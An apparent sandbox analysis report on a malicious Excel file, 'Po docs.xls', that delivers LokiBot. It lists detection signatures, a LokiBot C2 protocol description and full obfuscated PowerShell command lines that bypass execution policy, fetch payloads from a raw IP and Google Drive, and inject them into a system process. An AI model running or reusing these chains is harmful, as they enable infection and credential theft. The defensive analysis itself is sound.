Edit tour
Windows
Analysis Report
Po docs.xls
Overview
General Information
| Sample name: | Po docs.xls |
| Analysis ID: | 1545130 |
| MD5: | 4cbbf7815ee93202eb78ae0815ce9c2b |
| SHA1: | 093f0bbc7422766b465332e1c8f608422e702329 |
| SHA256: | dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1 |
| Tags: | xlsuser-abuse_ch |
| Infos: |   |
 | |
Detection
HTMLPhisher, Lokibot
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 3456 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 3748 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
powershell.exe (PID: 3836 cmdline: "C:\Window s\sysTem32 \WIndOwspo wERSHELl\V 1.0\POwErs HELl.EXE" "powerSHeL L.ExE -ex ByPaSs -NoP -w 1 -C DeVICEcR EdeNTiaLDE plOymENt.e XE ; IEX ($(iEX('[S ysTem.tExt .eNCOdINg] '+[cHaR]0x 3A+[ChAr]5 8+'Utf8.ge TstrinG([S YsteM.cOnV eRT]'+[cHA R]58+[CHAr ]58+'fRoMb aSE64STRiN G('+[ChaR] 34+'JDdhMT Q0NGY0ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIGFkZC 10WVBlICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW1FbUJFcm RFRmlOSXRp T24gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAnW0 RsbEltcG9y dCgiVVJsTW 9uIiwgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBD aGFyU2V0ID 0gQ2hhclNl dC5Vbmljb2 RlKV1wdWJs aWMgc3RhdG ljIGV4dGVy biBJbnRQdH IgVVJMRG93 bmxvYWRUb0 ZpbGUoSW50 UHRyICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgbU d5LHN0cmlu ZyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIFBaem FPalJ3d1As c3RyaW5nIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbUgsdWlu dCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIEtRWE 1LY1JIQmMs SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbkV4Tyk7 JyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uYU 1lICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIkFm IiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OYW 1FU3BBQ2Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBsYU5FRG sgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtUGFz c1RocnU7IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJDdhMTQ0 NGY0OjpVUk xEb3dubG9h ZFRvRmlsZS gwLCJodHRw Oi8vMTk4Lj Q2LjE3OC4x NTEvNjUvc2 VldGhlYmVz dGh0aW5nc3 dpdGhtZXdo aWNoZ2l2ZW dyZWF0b3V0 cHV0b2ZtZW dvb2QudElG IiwiJGVOVj pBUFBEQVRB XHNlZXRoZW Jlc3RodGlu Z3N3aXRobW V3aGljaGdp dmVncmVhdG 91dHB1dG9m bS52QnMiLD AsMCk7U1RB cnQtc0xlRX AoMyk7c1RB UlQgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiJE VuVjpBUFBE QVRBXHNlZX RoZWJlc3Ro dGluZ3N3aX RobWV3aGlj aGdpdmVncm VhdG91dHB1 dG9mbS52Qn Mi'+[cHar] 0X22+'))') ))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3952 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ex ByPaSs -NoP -w 1 -C DeVICE cREdeNTiaL DEplOymENt .eXE MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 4048 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\3lzsni zg\3lzsniz g.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 4056 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES1F25.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\3lz snizg\CSCB F63D2839AE 346389099B F789A42623 B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
wscript.exe (PID: 3144 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seeth ebesthting swithmewhi chgivegrea toutputofm .vBs" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 2512 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRTaE VMTElkWzFd KyRzaGVsTE lkWzEzXSsn eCcpICgoJ1 M3RmltYWdl JysnVXJsID 0gYkJIaHR0 cHM6Ly9kcm l2ZS5nb29n bGUuY29tL3 VjP2V4cG9y dD1kb3dubG 9hZCZpZD0x QUlWZ0pKSn YxRjZ2UzRz VU95Ym5ILX NEdlVoQll3 dXIgYkJIO1 M3RndlYkNs aWVudCA9IE 5ldy1PYmpl Y3QgU3lzdG VtLk5ldC5X ZWJDbGllbi crJ3Q7UzdG aW1hZ2VCeX RlcyA9IFM3 RndlYkNsaW VudC5Eb3du bG9hZERhJy sndGEoUzdG aW1hJysnZ2 VVcmwpO1M3 RmltYWdlVG V4dCA9Jysn IFtTeXN0ZW 0uVGUnKyd4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nJysn KFM3RmltYW dlQnl0ZXMp O1M3RnN0YX J0RmxhZyA9 IGJCSDw8Jy snQkFTRTY0 XycrJ1NUQV JUPj5iQkg7 UzdGZW5kRm xhZyA9IGIn KydCSDw8Qk FTRTY0X0VO RD4+YkJIO1 M3RnN0YXJ0 SW5kZXggPS BTN0ZpbWFn ZVRleHQuSW 5kZXhPZihT N0ZzdGFydE ZsYWcpO1M3 RmVuZEluZG V4JysnID0g UzdGaW1hZ2 VUZXh0Lklu ZGV4T2YoUz dGZW5kRmxh JysnZyk7Uz dGc3RhcnRJ bmRleCAtZ2 UgJysnMCAt YW5kIFM3Rm VuZEluZGV4 IC1ndCBTN0 ZzdCcrJ2Fy dEluZGV4O1 M3RnN0YXJ0 SW5kZXggKz 0gUzdGJysn c3RhcnRGbG FnLkxlbmcn Kyd0aDtTN0 ZiYScrJ3Nl NjRMZW5ndG ggPSBTN0Zl bmRJbmRleC AtIFM3RnN0 YXInKyd0SW 5kZXg7UzdG YmFzZTY0Q2 9tbWFuZCA9 IFM3RmltYW dlVGV4dC5T dWJzdHJpbm coUzdGc3Rh cnRJbmRleC wgUzdGYmFz ZTY0TCcrJ2 VuZ3RoKTsn KydTN0ZiYX NlNjRSZXZl cnNlZCA9IC 1qbycrJ2lu ICcrJyhTN0 ZiYXNlNjRD b21tYW5kLl RvQ2hhckFy cmF5KCkgQk RGIEZvckVh Y2gtT2JqZW N0IHsgUzdG XyB9KVsnKy ctJysnMS4n KycuLShTN0 ZiYXNlNjRD b21tYW5kLk xlbmd0aCld O1M3RmNvbW 1hbmRCeXRl cyA9IFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coUzdGYicr J2FzZTY0Um V2ZXJzZWQp O1M3RmxvYW RlZEFzJysn c2VtJysnYm x5ID0gW1N5 c3RlbS5SZW ZsZWN0aW9u LkFzc2VtYm x5XTo6TG9h ZChTN0Zjb2 1tYScrJ25k JysnQnl0Jy snZXMpO1M3 RnZhaU1ldG hvZCA9IFtk bmxpYi5JTy 5Ib21lXScr Jy5HZXRNZX Rob2QoYkJI VkFJJysnYk JIKTtTN0Z2 YWlNZXRob2 QuSW52b2tl KFM3Rm51Jy snbGwsIEAo YkJIdHh0Lk tMTExQTVMv NTYvMTUxLj g3MS42NC44 OTEvLzpwdH RoYkJILCBi QkhkZXNhdG l2YWRvYkJI LCBiQkhkZX NhdGl2YWRv YkInKydILC BiQkhkZXNh dGl2YWRvYk JILCBiQkhh c3BuZXRfcm VnYnJvd3Nl cnNiQkgsIG JCSGRlc2F0 aXZhZG9iQk gsIGJCSGRl c2F0aXZhZG 9iQkgsYkJI ZGVzYXRpdm Fkb2JCSCxi QkhkZXNhdG l2YWRvJysn YkJILGJCSG Rlc2F0aXZh ZG8nKydiQk gsYkJIZGUn KydzYXRpdm Fkb2JCSCxi QkhkZXNhdG l2YWRvYkJI LGJCSDFiQk gsYkJIZGVz YXRpdmFkb2 JCSCkpOycp LlJlUGxhY0 UoJ0JERics J3wnKS5SZV BsYWNFKCdi QkgnLFtzdF JpbmddW2No YXJdMzkpLl JlUGxhY0Uo J1M3RicsJy QnKSk=';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ ShELLId[1] +$shelLId[ 13]+'x') ( ('S7Fimage '+'Url = b BHhttps:// drive.goog le.com/uc? export=dow nload&id=1 AIVgJJJv1F 6vS4sUOybn H-sDvUhBYw ur bBH;S7F webClient = New-Obje ct System. Net.WebCli en'+'t;S7F imageBytes = S7FwebC lient.Down loadDa'+'t a(S7Fima'+ 'geUrl);S7 FimageText ='+' [Sys tem.Te'+'x t.Encoding ]::UTF8.Ge tString'+' (S7FimageB ytes);S7Fs tartFlag = bBH<<'+'B ASE64_'+'S TART>>bBH; S7FendFlag = b'+'BH< <BASE64_EN D>>bBH;S7F startIndex = S7Fimag eText.Inde xOf(S7Fsta rtFlag);S7 FendIndex' +' = S7Fim ageText.In dexOf(S7Fe ndFla'+'g) ;S7FstartI ndex -ge ' +'0 -and S 7FendIndex -gt S7Fst '+'artInde x;S7Fstart Index += S 7F'+'start Flag.Leng' +'th;S7Fba '+'se64Len gth = S7Fe ndIndex - S7Fstar'+' tIndex;S7F base64Comm and = S7Fi mageText.S ubstring(S 7FstartInd ex, S7Fbas e64L'+'eng th);'+'S7F base64Reve rsed = -jo '+'in '+'( S7Fbase64C ommand.ToC harArray() BDF ForEa ch-Object { S7F_ })[ '+'-'+'1.' +'.-(S7Fba se64Comman d.Length)] ;S7Fcomman dBytes = [ System.Con vert]::Fro mBase64Str ing(S7Fb'+ 'ase64Reve rsed);S7Fl oadedAs'+' sem'+'bly = [System. Reflection .Assembly] ::Load(S7F comma'+'nd '+'Byt'+'e s);S7FvaiM ethod = [d nlib.IO.Ho me]'+'.Get Method(bBH VAI'+'bBH) ;S7FvaiMet hod.Invoke (S7Fnu'+'l l, @(bBHtx t.KLLLPMS/ 56/151.871 .64.891//: ptthbBH, b BHdesativa dobBH, bBH desativado bB'+'H, bB Hdesativad obBH, bBHa spnet_regb rowsersbBH , bBHdesat ivadobBH, bBHdesativ adobBH,bBH desativado bBH,bBHdes ativado'+' bBH,bBHdes ativado'+' bBH,bBHde' +'sativado bBH,bBHdes ativadobBH ,bBH1bBH,b BHdesativa dobBH));') .RePlacE(' BDF','|'). RePlacE('b BH',[stRin g][char]39 ).RePlacE( 'S7F','$') )" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - aspnet_regbrowsers.exe (PID: 3128 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_regbro wsers.exe" MD5: 04AA198D72229AEED129DC20201BF030) - mshta.exe (PID: 2684 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 2876 cmdline:
"C:\Window s\sysTem32 \WIndOwspo wERSHELl\V 1.0\POwErs HELl.EXE" "powerSHeL L.ExE -ex ByPaSs -NoP -w 1 -C DeVICEcR EdeNTiaLDE plOymENt.e XE ; IEX ($(iEX('[S ysTem.tExt .eNCOdINg] '+[cHaR]0x 3A+[ChAr]5 8+'Utf8.ge TstrinG([S YsteM.cOnV eRT]'+[cHA R]58+[CHAr ]58+'fRoMb aSE64STRiN G('+[ChaR] 34+'JDdhMT Q0NGY0ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIGFkZC 10WVBlICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW1FbUJFcm RFRmlOSXRp T24gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAnW0 RsbEltcG9y dCgiVVJsTW 9uIiwgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBD aGFyU2V0ID 0gQ2hhclNl dC5Vbmljb2 RlKV1wdWJs aWMgc3RhdG ljIGV4dGVy biBJbnRQdH IgVVJMRG93 bmxvYWRUb0 ZpbGUoSW50 UHRyICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgbU d5LHN0cmlu ZyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIFBaem FPalJ3d1As c3RyaW5nIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbUgsdWlu dCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIEtRWE 1LY1JIQmMs SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbkV4Tyk7 JyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uYU 1lICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIkFm IiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OYW 1FU3BBQ2Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBsYU5FRG sgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtUGFz c1RocnU7IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJDdhMTQ0 NGY0OjpVUk xEb3dubG9h ZFRvRmlsZS gwLCJodHRw Oi8vMTk4Lj Q2LjE3OC4x NTEvNjUvc2 VldGhlYmVz dGh0aW5nc3 dpdGhtZXdo aWNoZ2l2ZW dyZWF0b3V0 cHV0b2ZtZW dvb2QudElG IiwiJGVOVj pBUFBEQVRB XHNlZXRoZW Jlc3RodGlu Z3N3aXRobW V3aGljaGdp dmVncmVhdG 91dHB1dG9m bS52QnMiLD AsMCk7U1RB cnQtc0xlRX AoMyk7c1RB UlQgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiJE VuVjpBUFBE QVRBXHNlZX RoZWJlc3Ro dGluZ3N3aX RobWV3aGlj aGdpdmVncm VhdG91dHB1 dG9mbS52Qn Mi'+[cHar] 0X22+'))') ))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3388 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ex ByPaSs -NoP -w 1 -C DeVICE cREdeNTiaL DEplOymENt .eXE MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3848 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\y2w1vq 2t\y2w1vq2 t.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3808 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES603A.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\y2w 1vq2t\CSCE 3D35A7BEA6 4426091DB9 BB55EAE7DE C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 3776 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seeth ebesthting swithmewhi chgivegrea toutputofm .vBs" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3904 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRTaE VMTElkWzFd KyRzaGVsTE lkWzEzXSsn eCcpICgoJ1 M3RmltYWdl JysnVXJsID 0gYkJIaHR0 cHM6Ly9kcm l2ZS5nb29n bGUuY29tL3 VjP2V4cG9y dD1kb3dubG 9hZCZpZD0x QUlWZ0pKSn YxRjZ2UzRz VU95Ym5ILX NEdlVoQll3 dXIgYkJIO1 M3RndlYkNs aWVudCA9IE 5ldy1PYmpl Y3QgU3lzdG VtLk5ldC5X ZWJDbGllbi crJ3Q7UzdG aW1hZ2VCeX RlcyA9IFM3 RndlYkNsaW VudC5Eb3du bG9hZERhJy sndGEoUzdG aW1hJysnZ2 VVcmwpO1M3 RmltYWdlVG V4dCA9Jysn IFtTeXN0ZW 0uVGUnKyd4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nJysn KFM3RmltYW dlQnl0ZXMp O1M3RnN0YX J0RmxhZyA9 IGJCSDw8Jy snQkFTRTY0 XycrJ1NUQV JUPj5iQkg7 UzdGZW5kRm xhZyA9IGIn KydCSDw8Qk FTRTY0X0VO RD4+YkJIO1 M3RnN0YXJ0 SW5kZXggPS BTN0ZpbWFn ZVRleHQuSW 5kZXhPZihT N0ZzdGFydE ZsYWcpO1M3 RmVuZEluZG V4JysnID0g UzdGaW1hZ2 VUZXh0Lklu ZGV4T2YoUz dGZW5kRmxh JysnZyk7Uz dGc3RhcnRJ bmRleCAtZ2 UgJysnMCAt YW5kIFM3Rm VuZEluZGV4 IC1ndCBTN0 ZzdCcrJ2Fy dEluZGV4O1 M3RnN0YXJ0 SW5kZXggKz 0gUzdGJysn c3RhcnRGbG FnLkxlbmcn Kyd0aDtTN0 ZiYScrJ3Nl NjRMZW5ndG ggPSBTN0Zl bmRJbmRleC AtIFM3RnN0 YXInKyd0SW 5kZXg7UzdG YmFzZTY0Q2 9tbWFuZCA9 IFM3RmltYW dlVGV4dC5T dWJzdHJpbm coUzdGc3Rh cnRJbmRleC wgUzdGYmFz ZTY0TCcrJ2 VuZ3RoKTsn KydTN0ZiYX NlNjRSZXZl cnNlZCA9IC 1qbycrJ2lu ICcrJyhTN0 ZiYXNlNjRD b21tYW5kLl RvQ2hhckFy cmF5KCkgQk RGIEZvckVh Y2gtT2JqZW N0IHsgUzdG XyB9KVsnKy ctJysnMS4n KycuLShTN0 ZiYXNlNjRD b21tYW5kLk xlbmd0aCld O1M3RmNvbW 1hbmRCeXRl cyA9IFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coUzdGYicr J2FzZTY0Um V2ZXJzZWQp O1M3RmxvYW RlZEFzJysn c2VtJysnYm x5ID0gW1N5 c3RlbS5SZW ZsZWN0aW9u LkFzc2VtYm x5XTo6TG9h ZChTN0Zjb2 1tYScrJ25k JysnQnl0Jy snZXMpO1M3 RnZhaU1ldG hvZCA9IFtk bmxpYi5JTy 5Ib21lXScr Jy5HZXRNZX Rob2QoYkJI VkFJJysnYk JIKTtTN0Z2 YWlNZXRob2 QuSW52b2tl KFM3Rm51Jy snbGwsIEAo YkJIdHh0Lk tMTExQTVMv NTYvMTUxLj g3MS42NC44 OTEvLzpwdH RoYkJILCBi QkhkZXNhdG l2YWRvYkJI LCBiQkhkZX NhdGl2YWRv YkInKydILC BiQkhkZXNh dGl2YWRvYk JILCBiQkhh c3BuZXRfcm VnYnJvd3Nl cnNiQkgsIG JCSGRlc2F0 aXZhZG9iQk gsIGJCSGRl c2F0aXZhZG 9iQkgsYkJI ZGVzYXRpdm Fkb2JCSCxi QkhkZXNhdG l2YWRvJysn YkJILGJCSG Rlc2F0aXZh ZG8nKydiQk gsYkJIZGUn KydzYXRpdm Fkb2JCSCxi QkhkZXNhdG l2YWRvYkJI LGJCSDFiQk gsYkJIZGVz YXRpdmFkb2 JCSCkpOycp LlJlUGxhY0 UoJ0JERics J3wnKS5SZV BsYWNFKCdi QkgnLFtzdF JpbmddW2No YXJdMzkpLl JlUGxhY0Uo J1M3RicsJy QnKSk=';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 4032 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ ShELLId[1] +$shelLId[ 13]+'x') ( ('S7Fimage '+'Url = b BHhttps:// drive.goog le.com/uc? export=dow nload&id=1 AIVgJJJv1F 6vS4sUOybn H-sDvUhBYw ur bBH;S7F webClient = New-Obje ct System. Net.WebCli en'+'t;S7F imageBytes = S7FwebC lient.Down loadDa'+'t a(S7Fima'+ 'geUrl);S7 FimageText ='+' [Sys tem.Te'+'x t.Encoding ]::UTF8.Ge tString'+' (S7FimageB ytes);S7Fs tartFlag = bBH<<'+'B ASE64_'+'S TART>>bBH; S7FendFlag = b'+'BH< <BASE64_EN D>>bBH;S7F startIndex = S7Fimag eText.Inde xOf(S7Fsta rtFlag);S7 FendIndex' +' = S7Fim ageText.In dexOf(S7Fe ndFla'+'g) ;S7FstartI ndex -ge ' +'0 -and S 7FendIndex -gt S7Fst '+'artInde x;S7Fstart Index += S 7F'+'start Flag.Leng' +'th;S7Fba '+'se64Len gth = S7Fe ndIndex - S7Fstar'+' tIndex;S7F base64Comm and = S7Fi mageText.S ubstring(S 7FstartInd ex, S7Fbas e64L'+'eng th);'+'S7F base64Reve rsed = -jo '+'in '+'( S7Fbase64C ommand.ToC harArray() BDF ForEa ch-Object { S7F_ })[ '+'-'+'1.' +'.-(S7Fba se64Comman d.Length)] ;S7Fcomman dBytes = [ System.Con vert]::Fro mBase64Str ing(S7Fb'+ 'ase64Reve rsed);S7Fl oadedAs'+' sem'+'bly = [System. Reflection .Assembly] ::Load(S7F comma'+'nd '+'Byt'+'e s);S7FvaiM ethod = [d nlib.IO.Ho me]'+'.Get Method(bBH VAI'+'bBH) ;S7FvaiMet hod.Invoke (S7Fnu'+'l l, @(bBHtx t.KLLLPMS/ 56/151.871 .64.891//: ptthbBH, b BHdesativa dobBH, bBH desativado bB'+'H, bB Hdesativad obBH, bBHa spnet_regb rowsersbBH , bBHdesat ivadobBH, bBHdesativ adobBH,bBH desativado bBH,bBHdes ativado'+' bBH,bBHdes ativado'+' bBH,bBHde' +'sativado bBH,bBHdes ativadobBH ,bBH1bBH,b BHdesativa dobBH));') .RePlacE(' BDF','|'). RePlacE('b BH',[stRin g][char]39 ).RePlacE( 'S7F','$') )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Loki Password Stealer (PWS), LokiBot | "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN 